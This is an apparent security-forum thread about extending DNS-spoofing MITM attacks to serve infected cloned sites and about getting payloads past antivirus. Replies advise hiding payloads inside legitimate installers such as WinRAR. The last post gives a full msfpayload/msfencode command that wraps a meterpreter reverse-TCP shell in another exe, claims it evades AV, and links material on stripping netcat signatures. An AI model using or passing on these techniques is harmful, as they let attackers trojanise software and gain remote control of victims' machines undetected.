
Thread: DNS Spoof

  1. #1
    Member
    Join Date
    Jun 2008
    Posts
    50

    DNS Spoof

    Had a play with different scripts and thought of a possible enhancement (I don't have the skills to do this but thought I would share the idea).

    SET and other MITM scripts generally rely on a victim going to a cloned website for a payload to be executed. How about the attacker webserver hosting a number of cloned sites? Say if it could handle 1000s, then the whole web from the victim's point of view could be affected...

    Alternatively, could the webserver create cloned and infected sites on the fly, i.e. victim requests backtrack.org so the webserver constructs the site and infects it with a payload?

    Just a thought, if crap feel free to delete thread...

    (PS don't bother coming back saying "yeah great idea, looking forward to seeing the script"; I have clearly stated this is an idea and that I do not have the skills.)

    (PPS still struggling to get payloads past AV. Read various posts and links but still struggling; latest was to encode, but how would I go about writing one of these?)

  2. #2
    Senior Member LHYX1
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Re: DNS Spoof

    Quote: (PPS still struggling to get payloads past AV. Read various posts and links but still struggling; latest was to encode, but how would I go about writing one of these?)

    Just inject payloads into another exe file with a big enough .text segment. For example the WinRAR installer should work.
    And first start with a bind shell or something small before trying meterpreter.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  3. #3
    Member
    Join Date
    Jun 2008
    Posts
    50

    Re: DNS Spoof

    Had a quick play around with WinRAR and can create an sfx.exe, which seems to extract to a folder (wouldn't this then trigger the AV?) and run the program (I was testing with wzcook.exe, which our work AV doesn't pick up as a virus, but intend to try at home later with a Nirsoft WKV or an msf reverse binder).

    Is this what you mean by "inject"? I thought I would be trying to combine, say, netstat.exe and wzcook.exe into 1 exe, but this doesn't seem to be the case with WinRAR?

  4. #4
    My life is this forum thorin
    Join Date
    Jan 2010
    Posts
    2,629
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    My life is this forum thorin
    Join Date
    Jan 2010
    Posts
    2,629

  6. #6
    Senior Member LHYX1
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Re: DNS Spoof

    msfpayload has the option to put a payload inside another exe file. That's what I meant with injecting.

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x someexe.exe -o output.exe
    This worked for me with the WinRAR exe and doesn't get detected by AV.
    If you want to get netcat past the AV, you will need to remove the file signature.

    http://www.mattszafran.co.uk/papers/...atsFileSig.pdf
    http://dl.packetstormsecurity.net/pa...ack_Netcat.pdf

    And I remember there's a video on the site of offensive security "I piss on your AV". You could watch that also.
    http://www.offensive-security.com/resources/videos/
    Last edited by LHYX1; 04-11-2011 at 05:40 PM.
